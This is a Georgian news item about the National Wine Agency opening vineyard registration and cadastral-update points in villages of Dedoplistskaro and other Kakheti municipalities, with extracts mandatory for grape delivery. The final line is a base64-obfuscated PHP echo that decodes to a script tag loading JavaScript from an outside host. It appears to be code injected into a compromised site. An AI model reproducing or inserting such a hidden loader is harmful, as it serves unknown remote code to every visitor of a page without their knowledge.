celsiusi
ავერსი საქკაბელი
დედოფლისწყაროს მუნიციპალიტეტში ვენახების რეგისტრაცია და საკადასტრო ინფორმაციის განახლება დაიწყო:
 
როგორც "ბიზნეს თაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს, ვენახების სარეგისტრაციო უბნები განთავსებულია დედოფლისწყაროს მუნიციპალიტეტის შემდეგ სოფლებში: ფიროსმანი, სამთაწყარო, არხილოსკალო და ზემო ქედი, უახლოეს დღეებში დაემატება ახალი ლოკაციები.
 
2021 წლიდან, რთველის დროს, ვენახების საკადასტრო ამონაწერის გარეშე, მევენახე ღვინის საწარმოს ყურძენს ვერ ჩააბარებს.
 
ვენახების რეგისტრაცია და კადასტრის ამონაწერით მოსავლის ჩაბარება ყველა მევენახისთვის სავალდებულო გახდა. განახლება სავალდებულოა ვენახთან დაკავშირებული ცვლილებების შემთხვევებში - ყიდვა-გაყიდვა, გაქირავება, გაჩუქება, გაშენება ან ამოძირკვა.
 
მევენახემ სარეგისტრაციო უბნებზე უნდა წარადგინოს მხოლოდ პირადობის მოწმობა, საკადასტრო ამონაწერის მიღება უფასოა.
 
ფერმერებს ვენახების რეგისტრაცია და ვენახის საკადასტრო ინფორმაციის განახლება ასევე მიმდინარეობს ყვარელში, გურჯაანში, სიღნაღში, თელავში, ახმეტაში და  აღნიშნული მუნიციპალიტეტების სოფლებში განთავსებულ სარეგისტრაციო უბნებში. ლაგოდეხისა და საგარეჯოს მუნიციპალიტეტებში რეგისტრაცია უახლოეს დღეებში დაიწყება.
 
ვენახების კადასტრის პროგრამასთან დაკავშირებული დამატებითი ინფორმაციის მისაღებად, დაინტერესებულ პირებს შეუძლიათ  გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ცხელ ხაზს - 1501 დაუკავშირდნენ.
 
 
1406
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");